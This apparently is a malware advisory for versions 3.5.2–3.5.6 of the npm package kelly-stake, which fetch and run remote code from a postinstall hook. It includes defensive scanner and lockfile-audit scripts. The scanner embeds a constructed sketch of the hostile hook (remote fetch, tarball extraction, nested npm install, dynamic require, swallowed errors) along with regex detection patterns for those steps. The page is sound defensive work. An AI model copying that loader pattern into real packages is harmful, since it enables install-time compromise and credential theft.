MAL-2026-6482: Malicious code in kelly-stake (npm)
The kelly-stake npm package, in versions 3.5.2 through 3.5.6, contains malicious code that runs arbitrary commands on the consumer's machine during installation. A postinstall script downloads and executes unverified remote code from an attacker-controlled domain, giving the attacker remote code execution without any action or awareness on the user's part. Because the payload location is fetched at install time rather than shipped in the package, the attacker can rotate payloads without republishing. The script also suppresses errors, so the install completes normally whether or not the payload was delivered, leaving no visible failure for the user to notice.
AI Analysis
Technical Summary
The kelly-stake npm package includes a postinstall hook script (scripts/install-check.cjs) that performs a two-stage remote code execution attack. Upon npm install, it fetches a JSON configuration from an attacker-controlled URL, extracts a URL to a malicious tarball, downloads and extracts it, runs npm install inside the extracted directory, then requires and executes a function from the malicious module. The remote payload URL is unpinned and unverified, allowing the attacker to change the payload at will without republishing the package. Errors during this process are caught and downgraded to warnings, ensuring the install succeeds silently while executing arbitrary attacker code.
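The install-hook chain described above can be triaged statically before a package is ever installed. The following Node.js script is an added example written for this page, not code from the advisory or from the kelly-stake package: it reads a package manifest, finds any lifecycle hook npm runs automatically, and scores the hook's script source against indicators of the described pattern (a remote fetch, archive extraction, shelling out to npm, a dynamic require, and a catch-all that downgrades failures to warnings). The manifest, the hook source and the indicator weights are all constructed for the example; the hook source is only a sketch of the behaviour the advisory describes and is not the actual malicious script.

```javascript
'use strict';

// Lifecycle hooks that npm runs automatically during `npm install`.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators of a remote-code-loading install hook. The regexes and weights
// are a heuristic chosen for this example, not a published scoring scheme.
const INDICATORS = [
  { id: 'remote-fetch',       weight: 2, re: /\b(?:https?\.get|fetch|axios|got)\s*\(|https?:\/\//i },
  { id: 'archive-extract',    weight: 1, re: /\b(?:tar|unzip|extract|gunzip)\b/i },
  { id: 'shell-exec',         weight: 2, re: /\b(?:execSync|spawnSync|execFileSync|exec|spawn)\s*\(/ },
  { id: 'nested-npm-install', weight: 2, re: /\bnpm\s+(?:install|i|ci)\b/ },
  { id: 'dynamic-require',    weight: 2, re: /\brequire\s*\(\s*[^'"`\s)]/ },
  { id: 'swallowed-errors',   weight: 1, re: /\bcatch\b[^{]*\{\s*(?:console\.warn|\})/ },
];

// A remote fetch plus any single execution indicator reaches this threshold.
const SUSPICIOUS_SCORE = 4;

// Lifecycle hooks a manifest declares, in the order npm runs them.
function installHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// The script file a hook command runs ("node scripts/x.cjs" -> "scripts/x.cjs"),
// or null when the command is inline shell.
function hookScriptFile(command) {
  const m = /(\S+\.[cm]?js)\b/.exec(command);
  return m ? m[1] : null;
}

// Score one script's source against the indicator list.
function scanInstallScript(source) {
  const matched = INDICATORS.filter((ind) => ind.re.test(source));
  return {
    score: matched.reduce((sum, ind) => sum + ind.weight, 0),
    hits: matched.map((ind) => ind.id),
  };
}

// Triage a package from its manifest and a map of script path -> source text.
// In a real scan both come from the unpacked tarball; nothing is installed.
function triagePackage(manifest, scriptSources) {
  const findings = installHooks(manifest).map(({ hook, command }) => {
    const file = hookScriptFile(command);
    // Fall back to scanning the command itself for inline hooks (curl | sh etc.).
    const source = file !== null && file in scriptSources ? scriptSources[file] : command;
    const { score, hits } = scanInstallScript(source);
    return { hook, file, score, hits, suspicious: score >= SUSPICIOUS_SCORE };
  });
  return { name: manifest.name, version: manifest.version, findings, suspicious: findings.some((f) => f.suspicious) };
}

// --- Constructed sample input (not the real package or its script) ---------

const SAMPLE_MANIFEST = {
  name: 'example-pkg', // constructed stand-in for a package under review
  version: '0.0.0',
  scripts: { postinstall: 'node scripts/install-check.cjs', test: 'node test.js' },
};

// Sketch of the hook pattern the advisory describes, written only to exercise
// the detector: it does not run and is not the actual malicious code.
const SAMPLE_SCRIPTS = {
  'scripts/install-check.cjs': `
    const https = require('https');
    const path = require('path');
    const tar = require('tar');
    const { execSync } = require('child_process');
    function main() {
      https.get('https://config.example.invalid/c.json', (res) => { /* read tarball URL */ });
      tar.x({ file: archive, cwd: dir });
      execSync('npm install', { cwd: dir, stdio: 'ignore' });
      require(path.join(dir, 'index.js')).run();
    }
    try { main(); } catch (e) { console.warn('install-check: skipped'); }
  `,
};

const BENIGN_MANIFEST = { name: 'tidy-pkg', version: '1.0.0', scripts: { postinstall: 'node scripts/stamp.js' } };
const BENIGN_SCRIPTS = {
  'scripts/stamp.js': `
    const fs = require('fs');
    fs.writeFileSync('.installed-at', new Date().toISOString());
  `,
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const [m, s] of [[SAMPLE_MANIFEST, SAMPLE_SCRIPTS], [BENIGN_MANIFEST, BENIGN_SCRIPTS]]) {
    console.log(JSON.stringify(triagePackage(m, s), null, 2));
  }
}
```

In practice the manifest and script sources come from the unpacked tarball (npm pack name@version, then inspect the archive without installing it); a hit on a remote fetch plus any execution indicator is enough to justify reading the script by hand. The score is a triage aid, not a verdict: install scripts for native add-ons legitimately run build tools, and a careful author can obfuscate past simple regexes.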
Potential Impact
Installing an affected version executes attacker-chosen code on the installing machine with the privileges of the user running npm install. That can lead to full compromise of the machine, theft of data and of any credentials and secrets reachable by that user, or deployment of further malware. Because the payload is fetched at install time and can change between installs, the package contents alone do not reveal what a given host actually ran, and the error suppression hides failed and successful payload delivery alike.
Mitigation Recommendations
There is no fix to wait for: the affected releases are malicious by design, so remediation is removal rather than upgrade. Remove kelly-stake 3.5.2, 3.5.3, 3.5.4, 3.5.5 and 3.5.6 from all projects and lockfiles, and do not install or update to these versions. Because the postinstall hook already ran on any machine or CI runner that installed them, treat such hosts as compromised: investigate or rebuild them rather than simply uninstalling the package, and rotate secrets that were available to the installing user (registry tokens, SSH keys, cloud and CI credentials). Monitor the advisory for further guidance. As a general precaution, run npm install with --ignore-scripts in CI and review the lifecycle scripts of new dependencies before allowing them to run.
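Acting on these recommendations starts with knowing where the package sits in a dependency tree, including when it is pulled in transitively. The script below is an added example for this page, not the advisory's or the project's code: it walks a package-lock.json in either the v1 layout (nested dependencies) or the v2/v3 layout (a flat packages map keyed by install path), reports any kelly-stake entry at a listed malicious version, and lists every package npm has flagged with hasInstallScript so the rest of the install-time surface is visible. The version list is taken from the advisory; the two sample lockfiles and every package name in them other than kelly-stake are constructed.

```javascript
'use strict';

// Malicious versions as listed in the advisory (the only data taken from it).
const AFFECTED = {
  'kelly-stake': new Set(['3.5.2', '3.5.3', '3.5.4', '3.5.5', '3.5.6']),
};

// Yield every package recorded in a package-lock.json. v2/v3 lockfiles keep a
// flat "packages" map keyed by install path; v1 nests "dependencies".
function* walkLockfile(lock) {
  if (lock.packages) {
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path === '') continue; // the root project itself
      const marker = 'node_modules/';
      const name = entry.name || path.slice(path.lastIndexOf(marker) + marker.length);
      // npm records hasInstallScript for packages with install-time hooks.
      yield { name, version: entry.version, path, hasInstallScript: entry.hasInstallScript === true };
    }
    return;
  }
  function* walkV1(deps, parentPath) {
    for (const [name, entry] of Object.entries(deps || {})) {
      const path = `${parentPath}node_modules/${name}`;
      // v1 lockfiles do not record install scripts, so that field is unknown.
      yield { name, version: entry.version, path, hasInstallScript: null };
      yield* walkV1(entry.dependencies, `${path}/`);
    }
  }
  yield* walkV1(lock.dependencies, '');
}

// Report affected packages (exact version match) and every package flagged as
// having an install script.
function auditLockfile(lock) {
  const affected = [];
  const installScripts = [];
  for (const pkg of walkLockfile(lock)) {
    const bad = AFFECTED[pkg.name];
    if (bad && bad.has(pkg.version)) affected.push(pkg);
    if (pkg.hasInstallScript === true) installScripts.push(pkg);
  }
  return { affected, installScripts, compromised: affected.length > 0 };
}

// Plain-text report suitable for a CI log.
function formatReport(result) {
  const lines = result.affected.map((p) => `AFFECTED ${p.name}@${p.version} at ${p.path}`);
  lines.push(...result.installScripts.map((p) => `install-script ${p.name}@${p.version} at ${p.path}`));
  lines.push(result.compromised ? 'verdict: treat host as compromised' : 'verdict: no listed versions found');
  return lines.join('\n');
}

// --- Constructed sample lockfiles (names other than kelly-stake are made up)

const SAMPLE_LOCK_V3 = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0', dependencies: { 'some-lib': '^2.0.0' } },
    'node_modules/some-lib': { version: '2.1.0', dependencies: { 'kelly-stake': '~3.5.0' } },
    'node_modules/some-lib/node_modules/kelly-stake': { version: '3.5.4', hasInstallScript: true },
    'node_modules/native-widget': { version: '0.9.1', hasInstallScript: true },
    'node_modules/@scope/util': { version: '1.2.3' },
  },
};

const SAMPLE_LOCK_V1 = {
  name: 'example-app',
  lockfileVersion: 1,
  dependencies: {
    'some-lib': { version: '2.1.0', dependencies: { 'kelly-stake': { version: '3.5.1' } } },
  },
};

if (typeof require !== 'undefined' && require.main === module) {
  const fs = require('fs');
  // Audit a real lockfile when a path is given, otherwise the constructed samples.
  const locks = process.argv[2]
    ? [JSON.parse(fs.readFileSync(process.argv[2], 'utf8'))]
    : [SAMPLE_LOCK_V3, SAMPLE_LOCK_V1];
  for (const lock of locks) console.log(formatReport(auditLockfile(lock)), '\n');
}
```

Run it as node audit-lock.js path/to/package-lock.json (the file name is an assumption). For an already-installed project, npm ls kelly-stake gives the same tree view, and npm install --ignore-scripts (or ignore-scripts=true in .npmrc) stops lifecycle hooks from running while you investigate; that also disables hooks that legitimate native packages rely on, so re-enable them deliberately once the tree is clean.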
Technical Details
- Gcve Source: db.gcve.eu
- Osv Id: MAL-2026-6482
- Osv Schema Version: 1.7.4
- Aliases: [] (none)
- Ecosystems: ["npm"]
- Database Specific Severity: null (not assigned)
- Cvss Version: null (no CVSS score assigned)
Threat ID: 6a3ef7de27e9c7971902640a
Added to database: 06/26/2026, 22:06:22 UTC
Last enriched: 06/26/2026, 22:41:40 UTC
Last updated: 06/26/2026, 23:04:43 UTC